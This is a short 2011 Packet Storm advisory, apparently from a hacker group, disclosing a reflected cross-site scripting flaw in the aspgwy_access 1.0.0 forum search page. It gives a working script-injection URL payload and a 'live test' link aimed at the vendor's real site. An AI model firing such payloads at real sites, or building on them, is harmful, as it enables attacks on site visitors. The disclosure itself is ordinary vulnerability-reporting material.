Aspgwy Access 1.0.0 Cross Site Scripting

2011-09-19T00:00:00
ID PACKETSTORM:105216
Type packetstorm
Reporter kurdish hackers team
Modified 2011-09-19T00:00:00

Description

                                        
                                            `===========================================================  
  
aspgwy_access_1.0.0 XSS Vulnerability  
  
-----------------------------------------------------------  
  
foun by :kurd-team  
  
group : kurdish hackers team  
  
contact : pshela@yahoo.com  
  
site : kurdteam.org  
  
-----------------------------------------------------------  
  
------------------------script-----------------------------  
  
-----------------------------------------------------------  
  
script :aspgwy_access_1.0.0  
  
site :http://www.aspgateway.com/  
  
download : http://www.aspgateway.com/downloads/aspgwy_access_1.0.0.zip  
  
-----------------------------------------------------------  
  
  
  
  
  
Exploit:  
  
--------  
  
  
  
Exmple:  
  
-------  
  
/forum/search_results.asp?search_word=&matchword="><script>alert('kurd-team')</script>&brd=&PageNum=2  
  
  
  
live teast :  
  
http://www.aspgateway.com/forum/search_results.asp?search_word=&matchword="><script>alert('kurd-team')</script>&brd=&PageNum=2  
  
-----------------------------------------------------------  
  
Zryan_kurd ,root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers  
  
-----------------------------------------------------------  
`